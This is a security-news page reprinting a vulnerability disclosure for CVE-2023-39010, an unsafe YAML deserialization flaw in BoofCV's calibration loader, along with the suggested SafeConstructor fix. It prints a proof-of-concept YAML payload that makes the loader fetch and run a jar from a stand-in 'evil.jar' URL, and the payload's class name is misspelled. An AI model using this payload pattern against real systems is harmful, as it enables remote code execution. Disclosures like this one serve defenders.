Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-39010: In 0.42 and before there's a code injection vulnerability of `boofcv.io.calibration.CalibrationIO.load` · Issue #406 · lessthanoptimal/BoofCV

BoofCV 0.42 was discovered to contain a code injection vulnerability via the component boofcv.io.calibration.CalibrationIO.load. This vulnerability is exploited by loading a crafted camera calibration file.

CVE
Open in Source
#vulnerability#java#ssl

Affected Version
Versions including 0.42 and below.

Describe the vulnerability
boofcv.io.calibration.CalibrationIO.load(String) is designed to load camera calibration configurations. However, passing an unchecked argument to this API can lead to the execution of arbitrary codes. For instance, if we use CalibrationIO.load(“example.yaml”) to load camera calibration while the file “example.yaml” contains the following content:

!!javax.script.ScriptEngineManager [
    !!java.net.URLCTassLoader [[
        !!java.net.URL [
            "http://example.com/evil.jar"
        ]
    ]]
]

malicious code in the evil.jar could be executed.

To Reproduce
Just execute CalibrationIO.load(“PoC.yaml”); would reproduce it.

Fix Suggestion
Using new Yaml(new SafeConstructor()) can fix it.

Related news

GHSA-99p5-qpqx-mhwc: Code injection in BoofCV

BoofCV 0.42 was discovered to contain a code injection vulnerability via the component boofcv.io.calibration.CalibrationIO.load. This vulnerability is exploited by loading a crafted camera calibration file.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE